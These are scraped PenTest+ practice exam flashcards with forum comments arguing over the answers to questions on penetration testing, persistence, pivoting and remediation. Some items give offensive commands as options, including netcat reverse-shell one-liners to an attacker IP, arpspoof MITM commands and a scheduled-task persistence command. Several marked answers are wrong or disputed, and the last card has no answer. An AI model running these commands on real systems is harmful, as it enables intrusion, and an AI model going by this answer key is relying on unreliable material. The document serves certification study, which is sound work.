Actual Exam Questions Flashcards

1
Q

A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?

A. The latest vulnerability scan results

B. A list of sample application requests

C. An up-to-date list of possible exploits

D. A list of sample test accounts

A

B. A list of sample application requests

100%

2
Q

A penetration tester successfully exploits a DMZ server that appears to be listening on an outbound port. The penetration tester wishes to forward that traffic back to a device. Which of the following are the BEST tools to use for this purpose? (Choose two.)

A. Tcpdump

B. Nmap

C. Wireshark

D. SSH

E. Netcat

F. Cain and Abel

A

D. SSH

E. Netcat

100%

mr_robot

4 months ago

C and D - PenTest+ Practice Tests Book - SYBEX In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks.

upvoted 3 times

3
Q

A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Which of the following is the MOST likely reason?

A. Infrastructure is being replaced with similar hardware and software.

B. Systems administrators are applying the wrong patches.

C. The organization is not taking action to remediate identified findings.

D. The penetration testing tools were misconfigured.

A

C. The organization is not taking action to remediate identified findings.

100%

4
Q

A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the web application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance?

A. Document the findings with an executive summary, recommendations, and screenshots of the web application disclosure.

B. Connect to the SQL server using this information and change the password to one or two non-critical accounts to demonstrate a proof-of-concept to management.

C. Notify the development team of the discovery and suggest that input validation be implemented with a professional penetration testing company.

D. Request that management create an RFP to begin a formal engagement with a professional penetration testing company.

A

A. Document the findings with an executive summary, recommendations, and screenshots of the web application disclosure.

5
Q

A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?

A. Enable HTTP Strict Transport Security.

B. Enable a secure cookie flag.

C. Encrypt the communication channel.

D. Sanitize invalid user input.

A

A. Enable HTTP Strict Transport Security

100%

D1960

5 months, 3 weeks ago

D. Sanitize invalid user input? Even if you enable HTTP Strict Transport Security, the application is still using basic authentication. The problem is with the application, not the communication channel. Basic authentication may not stop an SQL injection.

upvoted 1 times

D1960

4 months, 2 weeks ago

I was wrong, the correct answer is A. https://en.wikipedia.org/wiki/Basic_access_authentication

upvoted 1 times

jon34thna

5 months, 2 weeks ago

SYBEX | Pentest Questions | Chapter 5 Reporting and Communication | Question 125 A. Enable HTTP Strict Transport Security

upvoted 1 times

mr_robot

4 months, 1 week ago

PenTest+ Practice Tests Book A. - In this scenario, the tester should recommend that the client enable HTTP Strict Transport Security (HSTS). The HSTS response header lets a website tell browsers that it should only be accessed using HTTPS, instead of using HTTP. It is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS.

6
Q

A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE).

A. Mandate all employees take security awareness training.

B. Implement two-factor authentication for remote access.

C. Install an intrusion prevention system.

D. Increase password complexity requirements.

E. Install a security information event monitoring solution.

F. Prevent members of the IT department from interactively logging in as administrators.

G. Upgrade the cipher suite used for the VPN solution.

A

A. Mandate all employees take security awareness training.

B. Implement two-factor authentication for remote access.

D. Increase password complexity requirements.

100%

A, C, G

A, D, G

Droid2000

11 months, 2 weeks ago

i think A should be included in ans

upvoted 4 times

AnAverageUser3656

9 months, 1 week ago

I agree with droid2000, “A” should be included and omit “G”. Improving employee education is a good way to mitigate phishing attacks.

upvoted 4 times

cooljane

8 months, 2 weeks ago

I believe correct answer are: A, D, G.

upvoted 2 times

phatboy

8 months, 1 week ago

It isn’t G, the cyphers are irrelevant, access was gained with phished credentials. The answer should definitely include B as this would have prevented access. I think the answer is either BDA or BDF.

upvoted 3 times

amankry

7 months, 3 weeks ago

A B D is the correct answer

upvoted 5 times

sharifengg

7 months, 3 weeks ago

A B D is the correct answer

upvoted 5 times

jon34thna

5 months, 2 weeks ago

SYBEX | PenTest+™ Practice Test | Chapter 5 | Reporting and Communication | Question 124 password complexity requirements. two-factor authentication for remote access. all employees take security awareness training. A | B | D

upvoted 3 times

mr_robot

3 months, 3 weeks ago

Actually the Sybex book states A | D | G. “In this scenario, the tester should recommend that the client increase their password complexity requirements since the tester was able to crack them by using a dictionary attack. The tester should also recommend that all employees take security awareness training, since it was a member of the IT department who gave up pertinent information when the tester used a phishing technique. The tester should also recommend upgrading the cipher suite that is used for the VPN solution. A cipher suite is a set of algorithms that help secure network connections that uses Transport Layer Security (TLS) or Secure Socket Layer (SSL). The set of algorithms that cipher suites usually contain includes a key exchange algorithm, a bulk encryption algorithm, and a message authentication code (MAC) algorithm.”

upvoted 1 times

mr_robot

1 month, 4 weeks ago

…but, I would go for A B D.

upvoted 1 times

ebot

1 month, 4 weeks ago

I would say ADG. Phishing requires employee awareness training, a weak password would require increased complexity, and the cipher suite needs to be upgraded. Should not be able to “easily” crack them. Possibly weak SSL or TLS. Source: Sybex page 163 & 166 “Insecure Cipher Use”

upvoted 1 times

mr_robot

1 month, 2 weeks ago

ADG seems to be the best even though MFA always goes together with strong passwords, but once you use a complex password together with AES 256-bit encryption, for instance, it would be almost impossible to crack it. https://securitygladiators.com/vpn-encryption-guide/#Ciphers https://securityboulevard.com/2020/05/aes-encryption-a-closer-look-at-advanced-encryption-standards/

upvoted 1 times

kabwitte

1 month ago

I don’t think that upgrading the cipher suite would change anything because the attacker was successful using social engineering (Phishing). The level of security really doesn’t mean much if the attacker is able to con their way through with a little bit of charm. As a result, I would go with ABD like Boblee.

upvoted 1 times

boblee

1 month, 3 weeks ago

The answer is A B D.

upvoted 1 times

Leonar

3 weeks, 1 day ago

People, Process, Technology. A - People B - Technology D - Process

7
Q

During testing, a critical vulnerability is discovered on a client’s core server. Which of the following should be the NEXT action?

A. Disable the network port of the affected service.

B. Complete all findings, and then submit them to the client.

C. Promptly alert the client with details of the finding.

D. Take the target offline so it cannot be exploited by an attacker.

A

C. Promptly alert the client with details of the finding

100%

phatboy

10 months, 3 weeks ago

I believe the answer should be C

upvoted 3 times

amankry

7 months, 3 weeks ago

C is correct answer

upvoted 3 times

D1960

5 months, 3 weeks ago

If it’s a critical vulnerability, shouldn’t you disable the port right away? Maybe A is the correct answer?

upvoted 1 times

jon34thna

5 months, 2 weeks ago

‘C’: a critical vulnerability is a reason to stop the pentest and call the client. Not A, because you are not the Network Administrator.

upvoted 4 times

mr_robot

4 months, 1 week ago

PenTest+ Practice Tests Book - SYBEX C. - In this scenario, since the penetration tester discovered a critical vulnerability, the tester should immediately alert the client with the details of the findings.

upvoted 2 times

maps7

3 months, 3 weeks ago

I will go with C because as a pentester your job is to report your findings and let the administrator make decisions. Companies have risks that they have accepted, so it will be wise to promptly alert the administrator of your findings, and then only they can make a decision.

upvoted 3 times

Leonar

3 weeks, 1 day ago

Why don’t we cut off the powerline? :) The best answer is C

8
Q

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?

A. Selection of the appropriate set of security testing tools

B. Current and load ratings of the ICS components

C. Potential operational and safety hazards

D. Electrical certification of hardware used in the test

A

A. Selection of the appropriate set of security testing tools

100%

mr_robot

4 months, 1 week ago

Probably A?

upvoted 1 times

mr_robot

3 months, 3 weeks ago

https://resources.infosecinstitute.com/pentesting-ics-systems/#gref

upvoted 1 times

D1960

3 months ago

With the possible exception of PLCSCAN, none of those tools are unique to ICS. However, health and safety issues at a power plant would be unique.

upvoted 1 times

D1960

3 months, 1 week ago

Maybe C? Tools are always an issue. But a power plant has health and safety issues beyond that of a typical office.

upvoted 3 times

mr_robot

2 months, 1 week ago

I would agree with you. Selection of the appropriate set of security testing tools is already part of any pentesting assessment according to the type of company and test you need to do, but when asked “Which of the following is a consideration unique to such an environment”, it means that the pentest also has to consider and assess potential operational and safety hazards present onsite. http://www.fedco.co.id/vulnerability-assessment-and-penetration-testing-in-online-scada-ics-environment-webinar/

upvoted 2 times

boblee

1 month, 3 weeks ago

The answer is A, because you would have to do more research to find tools that can test that specific SCADA system.

upvoted 3 times

kabwitte

1 month ago

I’m going for A. Reason? A single TCP or UDP port scan against a SCADA component can cause catastrophic damage of mass proportion. Before testing SCADA systems, pentesters should know the proper tools to use to ensure the testing provides adequate coverage and reduces the likelihood of knocking over critical services. Nutting, Raymond. CompTIA PenTest+ Certification All-in-One Exam Guide (Exam PT0-001) (p. 83). McGraw-Hill Education. Kindle Edition.

upvoted 2 times

Leonar

3 weeks, 1 day ago

It is always human life in the first place. C !

9
Q

A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester’s source IP addresses to the client’s IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester’s source IP addresses should be whitelisted?

A. Whitelisting prevents a possible inadvertent DoS attack against the IPS and supporting log-monitoring systems.

B. Penetration testing of third-party IPS systems often requires additional documentation and authorizations; potentially delaying the time-sensitive test.

C. IPS whitelisting rules require frequent updates to stay current, constantly developing vulnerabilities and newly discovered weaknesses.

D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.

A

D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.

100%

mr_robot

4 months, 1 week ago

PenTest+ Practice Tests Book - SYBEX D. - Whitelisting testers in intrusion prevention systems (IPSs), web application firewalls (WAFs), and other security devices will allow them to perform their tests without being blocked. For a white box test, this means that testers won’t spend time waiting to be unblocked when security measures detect their efforts. Black box and red team tests are more likely to result in testers being blacklisted or blocked by security measures. In this scenario, the penetration tester should tell the client that testing should focus on the discovery of potential security issues through all in-scope systems and not just on determining the effectiveness of active defenses such as the IPS.

upvoted 2 times

Leonar

3 weeks, 1 day ago

D is okay, but the best rationale is to let them know that threat actors are not only outsiders but also insiders who could be whitelisted.

10
Q

A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).

A. Randomize local administrator credentials for each machine.

B. Disable remote logons for local administrators.

C. Require multifactor authentication for all logins.

D. Increase minimum password complexity requirements.

E. Apply additional network access control.

F. Enable full-disk encryption on every workstation.

G. Segment each host into its own VLAN.

A

C. Require multifactor authentication for all logins.

D. Increase minimum password complexity requirements.

E. Apply additional network access control.

100%

mr_robot

4 months, 1 week ago

PenTest+ Practice Tests Book - SYBEX C, D and F - In this situation, since the tester was able to compromise a single workstation and is able to move laterally through the network, the best recommendations to give the client would be the following: - Use multifactor authentication. Multifactor authentication (MFA) is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism. - Increase minimum password complexity. Complex passwords use different types of characters in unique ways to increase security, making it harder for an attacker to crack. - Enable full-disk encryption. Full-disk encryption (FDE) is encryption at the hardware level. FDE works by automatically converting data on a hard drive into a form that cannot be understood by anyone who doesn’t have the key to “undo” the conversion.

upvoted 3 times

maps7

3 months, 2 weeks ago

but F how does disk encryption stops an attacker from the lateral movement?

upvoted 1 times

mr_robot

1 month, 3 weeks ago

You are right. I guess E would be a better option even though you can easily bypass NAC by spoofing your MAC address with a desk phone, for instance - https://resources.infosecinstitute.com/nac-hacking-bypassing-network-access-control/ But A seems to be a valid option too, as “Microsoft’s Local Administrator Password solution (LAPS) can have drastic impact in the fight against lateral movement techniques. It is an effective way to prevent some potential lateral movement or privilege escalation within your environment.” https://blog.stealthbits.com/running-laps-in-the-race-to-security/ https://blog.stealthbits.com/3-zero-cost-tactics-make-difficult-attackers-move-laterally/ But it can also be bypassed just like any security defense: https://www.youtube.com/watch?v=vaov8F-0dQ8 Anyway, I will stick with CDE.

upvoted 1 times

D1960

3 months, 2 weeks ago

Tough one. C & D for sure. But I am not sure if E or F is better. I think I will go with CDE. Encrypting a disk does not seem to address the problem that is presented: being able to easily move from one host to another.

upvoted 1 times

boblee

1 month, 3 weeks ago

The answer is CDE.

upvoted 1 times

kabwitte

1 month ago

I would go with C, D, G. I believe that the reason the attacker was able to move laterally without any obstacles is because all the hosts were on the same network. It takes more work to move laterally if these compromised hosts were on different networks. To accomplish such a task, a virtual LAN (VLAN) needs to be implemented. This would make each host look like it is on its own separate network. Thus, when the attacker compromises the initial host, the others won’t be readily available or seen.

upvoted 1 times

kabwitte

1 month ago

I think I have a change of heart on this one. I would go for CDE. Implementing a VLAN for each host in that ONE domain is a bit extreme for a recommendation. The easier approach would be additional network access controls which would apply to all hosts within that domain.

upvoted 1 times

Leonar

3 weeks, 1 day ago

G must be included as the top solution.

11
Q

Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?

A. To remove the persistence

B. To enable persistence

C. To report persistence

D. To check for persistence

A

A. To remove the persistence

100%

mr_robot

4 months, 1 week ago

PenTest+ Practice Tests Book - SYBEX A. chkconfig is a tool for managing which run levels a service will run at. chkconfig can be used to view or change the run level of a service. Using chkconfig --del will set the named service to not run at the current run level and will remove the persistence.

upvoted 5 times

noura_141

3 weeks, 2 days ago

Your comments are very helpful thank you

12
Q

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s home folder titled ‘‘changepass.”
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using “strings” to print ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
exit
setuid
strcmp
GLIBC_2.0
ENV_PATH
%s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?

A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass.

B. Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environmental variable to the path ‘/home/user/’. Then run changepass.

C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw. Then run changepass.

D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’.

A

D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’.

100%

phatboy

8 months, 1 week ago

How can the attacker run a command with sudo if they only have low-privilege access?

upvoted 1 times

Marshmallow

7 months, 1 week ago

The SUID is set for the write permission and that’s how the user can do SUDO.

upvoted 1 times

Evens_chokoe

5 months, 3 weeks ago

the attacker is running sudo just for Privilege escalation technique

upvoted 1 times

mr_robot

3 months, 3 weeks ago

I would go for D. - https://www.pentestpartners.com/security-blog/exploiting-suid-executables/

upvoted 1 times

mr_robot

1 month, 2 weeks ago

The tester needs to create another dodgy copy of the changepw script and move it to another directory (ex: \tmp), not the initial changepass executable. Export ENV_PATH to the chosen directory of the dodgy script (ex: \temp) and then run the changepass executable. “ChangePW is a freeware command line tool to set a password, display the current userAccountControl password flags, and enable or disable an account.” https://www.itprotoday.com/compute-engines/jsi-tip-9267-changepw-freeware-command-line-tool-set-password-display-current

upvoted 1 times

NoImDirtyDan

3 weeks, 2 days ago

C is what you are describing.

13
Q

A malicious user wants to perform a MITM attack on a computer. The computer network configuration is given below:

IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?

A. arpspoof -c both -r -t 192.168.1.1 192.168.1.20

B. arpspoof -t 192.168.1.20 192.168.1.254

C. arpspoof -c both -t 192.168.1.20 192.168.1.253

D. arpspoof -r -t 192.168.1.253 192.168.1.20

A

B. arpspoof -t 192.168.1.20 192.168.1.254

100%

mr_robot

4 months, 1 week ago

PenTest+ Practice Tests Book - SYBEX B. - A man-in-the-middle attack intercepts a communication between two systems. ARP stands for Address Resolution Protocol, and it allows the network to translate IP addresses into MAC addresses. In this scenario, the attacker wants to perform a man-in-the-middle attack; it is done by performing arpspoof -t . The -t switch specifies a particular host to ARP poison.

upvoted 3 times

NoImDirtyDan

3 weeks, 4 days ago

Correct answer is D. You must use -r to capture traffic in both directions, creating a true MITM.

14
Q

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).

A. nc 192.168.1.5 44444

B. nc -nlvp 44444 -e /bin/sh

C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f

D. nc -e /bin/sh 192.168.1.5 44444

E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f

F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f

A

C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f

D. nc -e /bin/sh 192.168.1.5 44444

100%

zgwy

11 months, 2 weeks ago

Wrong…C and D http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

upvoted 2 times

D1960

5 months, 3 weeks ago

I also think the correct answers are C and D. According to this site: https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/ This should work: # nc 192.168.1.5 44444 -e /bin/sh Note that D is very similar: nc -e /bin/sh 192.168.1.5 44444 - A is probably wrong because no shell is executed - B is probably wrong because no IP is specified - E is wrong because there is no port 444444 (too high a port) - F is wrong because the IP is 192.168.5.1, not 192.168.1.5

upvoted 2 times

deathfrom

3 months, 3 weeks ago

I think there are 3 correct answers here: B, C & D. B is needed to create a nc listener on the attacker’s machine. C will work when the -e option is not available for nc. D works because the -e option is available. More than likely it will be C/D.

upvoted 1 times

mr_robot

1 month, 2 weeks ago

The question asks for two possible ways to gain a reverse shell back to the attacking machine at 192.168.1.5. So the correct answers would be C and D. You can use either one to gain a reverse shell. B (nc -nlvp 44444 -e /bin/sh) is just a listener on the remote machine used for a bind shell. Bind Shell - have the listener running on the target and the attacker connect to the listener in order to gain a remote shell. nc -nvlp 5555 -e /bin/bash - setting up a listener on the remote machine nc -nv 192.168.10.10 5555 - use our machine to connect to it remotely Reverse Shell - have the listener running on the attacker and the target connecting to the attacker with a shell. nc -nvlp 5555 - setting up a listener on the attacker machine nc -nv 192.168.20.20 5555 -e /bin/bash - use the target machine to connect to our machine http://stuffjasondoes.com/2018/07/18/bind-shells-and-reverse-shells-with-netcat/ The thing is, everywhere I see this question B and C are correct, so what do we need to do to pass the exam: trust our own instincts/experience or what CompTIA believes is correct? Is it worth paying for the CompTIA CertMaster Practice in order to verify all those doubtful questions?

upvoted 1 times

boblee

1 month, 2 weeks ago

CertMaster does not have these questions. I have certmaster.

upvoted 1 times

NoImDirtyDan

4 weeks ago

The correct answers are C & D. Source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

15
Q

A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?

A. schtasks.exe /create/tr “powershell.exe” Sv.ps1 /run

B. net session server | dsquery -user | net use c$

C. powershell && set-executionpolicy unrestricted

D. reg save HKLM\System\CurrentControlSet\Services\Sv.reg

A

A. schtasks.exe /create/tr “powershell.exe” Sv.ps1 /run

100%

phatboy

8 months ago

Correct answer is A. https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/

upvoted 3 times

mr_robot

4 months, 3 weeks ago

According to PenTest+ Practice Tests Book - SYBEX D. - reg save saves a copy of specified subkeys, entries, and values of the registry in a specified file. A file with the .reg file extension is a registration file used by the Windows Registry. These files can contain hives, keys, and values.

upvoted 1 times

D1960

3 months, 2 weeks ago

What good is saving the registry entries, if you cannot restore them? If you lose your access to the system, how do you restore your access by restoring part of the registry?

upvoted 1 times

mr_robot

3 months ago

I agree with you; however, the schtasks command is incomplete. For the attacker to maintain persistence during logon he would need to add the /sc onlogon switch to the command: https://rasor.wordpress.com/2013/08/12/powershell-scheduling-a-task/ For that reason, I think D would not be the best answer but the least incorrect: https://rasor.wordpress.com/2013/08/12/powershell-scheduling-a-task/ “HKLM\System\CurrentControlSet\services The keys located here get loaded by the Service Controller at various times during the operation of the computer. Some are loaded at system startup and others are loaded on demand or when triggered by other events. The attackers want to load at startup so that even if no user logs in they can connect to the computer.”

upvoted 1 times

mr_robot

1 month, 3 weeks ago

Also, once you modify the registry you can add a dodgy service to be started at logon and maintain persistence to the device: https://threatvector.cylance.com/en_us/home/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services.html https://threatvector.cylance.com/en_us/home/windows-registry-persistence-part-2-the-run-keys-and-search-order.html

upvoted 1 times

mr_robot

1 month, 1 week ago

Best answer is A. You have to use “reg add” instead of “reg save” in order to add a new subkey or entry to the registry.

upvoted 2 times

khuno

4 weeks, 1 day ago

Examples reg add \ABC\HKLM\Software\MyCo reg save HKLM\Software\MyCo\MyApp AppBkUp.hiv

upvoted 1 times

merdoso

3 months, 2 weeks ago

Strange. Agree about A. The issue is that you could get persistence with both… but a reg key like this is strange.

upvoted 1 times

DaDude

3 months, 2 weeks ago

The schtasks command is not complete. /run is on demand (you would need to be on the machine to run this); if you lost connection you would not be able to run this again.

upvoted 1 times

D1960

2 months ago

But maybe you would not have to run it again? It depends on what the powershell script does.

upvoted 1 times

boblee

1 month, 3 weeks ago

The answer is A in this context. SYBEX is bad.

16
Q

Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?

A. set rhost 192.168.1.10

B. run autoroute -s 192.168.1.0/24

C. db_nmap -iL /tmp/privatehosts.txt

D. use auxiliary/server/socks4a

A

D. use auxiliary/server/socks4a

100%

D1960

4 months, 2 weeks ago

Maybe: B. run autoroute -s 192.168.1.0/24 ? Reference: https://www.offensive-security.com/metasploit-unleashed/Pivoting/

upvoted 1 times

mr_robot

2 months, 3 weeks ago

Agree with you. “Preparing to pivot across a network requires us to first establish a Meterpreter session on the victim machine. From there, we can use the autoroute script to enable access to the non-routable subnet” - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/server/socks4a.md run autoroute -s 192.168.1.0/24 - Add a route to 192.168.1.0/24 (establish a Meterpreter session on the victim machine - https://www.offensive-security.com/metasploit-unleashed/Pivoting/ use auxiliary/server/socks4a - Setup and run a socks proxy over meterpreter, this module provides a socks4a proxy server that uses the builtin Metasploit routing to relay connections. - https://www.offensive-security.com/metasploit-unleashed/proxytunnels/ https://nullsweep.com/pivot-cheatsheet-for-pentesters/ set rhost 192.168.1.10 - Set the target address db_nmap -iL /tmp/privatehosts.txt - Use nmap and place results in database

upvoted 1 times

kabwitte

4 weeks, 1 day ago

Yup, I believe you are correct sir! The link you provided actually gives the answer. :)

upvoted 1 times

mr_robot

4 months, 2 weeks ago

PenTest+ Practice Tests Book - SYBEX D. Metasploit is a tool for the development of exploits and the testing of them on live targets. The socks4a auxiliary is a module from within the framework. This auxiliary module provides a proxy server that uses Metasploit Framework routing to relay connections. So, using the use auxiliary/server/socks4a module allows a tester to access a private network from the Internet.

upvoted 4 times

mr_robot

2 months, 3 weeks ago

Don’t think this is right. Probably A is correct. - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/server/socks4a.md

upvoted 1 times

khuno

1 month, 3 weeks ago

It will be socks4a that will create a session through the internet. (the question says access the network.) It will not be autoroute because that will help you pivot to another computer in the network. Meaning you are already in.

upvoted 2 times

kabwitte

4 weeks, 1 day ago

I would go with B: Preparing to pivot across a network requires us to first establish a Meterpreter session on the victim machine. From there, we can use the autoroute script to enable access to the non-routable subnet: meterpreter > run autoroute -s 10.0.0.0/24 Note: A non-routable address is a private network address. Non-routable: https://docs.actian.com/dataconnect/11.1/index.html#page/User/Non-routable_Addresses.htm

upvoted 1 times

kabwitte

4 weeks, 1 day ago

Sorry, I missed a source for the autoroute script: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/server/socks4a.md

17
Q

A penetration tester was able to enter an SQL injection command into a text box and gain access to the information stored on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?

A. Randomize the credentials used to log in.

B. Install host-based intrusion detection.

C. Implement input normalization.

D. Perform system hardening.

A

D. Perform system hardening.

D1960

5 months, 3 weeks ago

This is an attack on an application, not a host. There might be some sort of host hardening that would help, maybe a WAF? But I cannot help but wonder if C is a better answer? I think input normalization would sanitize the input, which would prevent an SQL injection.

upvoted 2 times

jon34thna

5 months, 2 weeks ago

Yep difficult call here. But I think D is correct. If ‘C’ used the word Sanitization or Parameterized query I may be tempted but ‘Normalization’ ….? I would stick with D.

upvoted 1 times

mr_robot

4 months, 1 week ago

PenTest+ Practice Tests Book D. - System hardening, also known as operating system hardening, helps minimize security vulnerabilities. The purpose of system hardening is to get rid of as many security risks as possible. This is usually done by removing all nonessential software programs and utilities from the computer. The goal of systems hardening by removing unused programs, accounts, functions, applications, ports, permissions, access, etc., is that attackers have fewer opportunities to gain access to your network. There are several types of system hardening activities. They include the following:
Application hardening
Operating system hardening
Server hardening
Database hardening
Network hardening

upvoted 2 times

mr_robot

2 months ago

It seems Input Validation and Sanitisation are the first line of defense against SQL injections, even though Parameterised queries are better but in this scenario I think “the BEST recommendation” would be to do system hardening. “The risks associated with code injections are escalated when the databases or operating system tied to the Web applications under attack are weak due to poor patching and configuration. In addition, the system administrator should be responsible for hardening the underlying database and the operating system by disabling unnecessary services and functionality.” https://wikisites.cityu.edu.hk/sites/netcomp/articles/Pages/Hardening%20Steps%20to%20Mitigate%20Code%20Injection.aspx https://resources.infosecinstitute.com/sql-injection-protection-cloud-systems/

upvoted 1 times

boblee

1 month, 3 weeks ago

The answer is C.

upvoted 2 times

khuno

4 weeks, 1 day ago

https://www.essentialsql.com/get-ready-to-learn-sql-database-normalization-explained-in-simple-english/ Normalization is all about avoiding redundancy. “There are three main reasons to normalize a database. The first is to minimize duplicate data, the second is to minimize or avoid data modification issues, and the third is to simplify queries. “ I’ll go for D.

18
Q

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

A. From the remote computer, run the following commands:
export XHOST 192.168.1.10:0.0
xhost+
Terminal

B. From the local computer, run the following command:
ssh -L4444:127.0.0.1:6000 -X user@10.0.0.20 xterm

C. From the remote computer, run the following command:
ssh -R6000:127.0.0.1:4444 -p 6000 user@192.168.1.10 "xhost+; xterm"

D. From the local computer, run the following command:
nc -l -p 6000
Then, from the remote computer, run the following command:
xterm | nc 192.168.1.10 6000

A

A. From the remote computer, run the following commands:
export XHOST 192.168.1.10:0.0
xhost+
Terminal

100%

xxdxx

6 months, 1 week ago

When I tried these commands, only B worked successfully

upvoted 3 times

jon34thna

5 months, 2 weeks ago

I don’t think A. Several tests, and I think it is B or D.

upvoted 1 times

GOKU1984

4 months, 4 weeks ago

B is the only one that worked. D brought up an xterm window of the same terminal you were trying from.

upvoted 1 times

mr_robot

4 months, 1 week ago

Which Linux distro did you guys test the commands from B? I used the latest Kali but could not make it work. I got connection refused even though I had enabled SSH.

upvoted 1 times

D1960

3 months, 1 week ago

According to ssh man pages: -L [bind_address:]port:host:hostport : Specifies that connections to the given TCP port or Unix socket on the local (client) host are to be forwarded to the given host and port, or Unix socket, on the remote side. -X : Enables X11 forwarding

upvoted 1 times

mr_robot

1 month, 4 weeks ago

Another example for B: https://www.howtogeek.com/168145/how-to-use-ssh-tunneling/ https://explainshell.com/explain?cmd=ssh+-L4444%3A127.0.0.1%3A6000+-X+user%4010.0.0.20+xterm Commands from A seem incomplete: https://www.lifewire.com/linux-command-xhost-4093456

upvoted 1 times

khuno

1 month, 3 weeks ago

Isn’t the key here “graphic console window”? The other options are terminal only?

upvoted 1 times

khuno

4 weeks, 1 day ago

never mind, got confused with gui

upvoted 1 times

khuno

4 weeks, 1 day ago

I will go with D, just because the local IP on B is wrong

19
Q

Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?

A. Creating a scope of the critical production systems
B. Setting a schedule of testing access times
C. Establishing a white-box testing engagement
D. Having management sign off on intrusive testing

A

B. Setting a schedule of testing access times

100%

20
Q

A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

A. dsrm -users “DN=company.com; OU=hq CN=users”
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21

A

D. dsquery -o -rdn -limit 21

100%

21
Q

While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?

A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_CURRENT_USER
D. HKEY_CURRENT_CONFIG

A

C. HKEY_CURRENT_USER

100%

22
Q

In which of the following scenarios would a tester perform a Kerberoasting attack?

A. The tester has compromised a Windows device and dumps the LSA secrets.
B. The tester needs to retrieve the SAM database and crack the password hashes.
C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.
D. The tester has compromised an account and needs to dump hashes and plaintext passwords from the system.

A

C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.

100%

23
Q

Which of the following excerpts would come from a corporate policy?

A. Employee passwords must contain a minimum of eight characters, with one being alphanumeric.
B. The help desk can be reached at 800-passwd1 to perform password resets.
C. Employees must use strong passwords for accessing corporate assets.
D. The corporate systems must store passwords using the MD5 hashing algorithm.

A

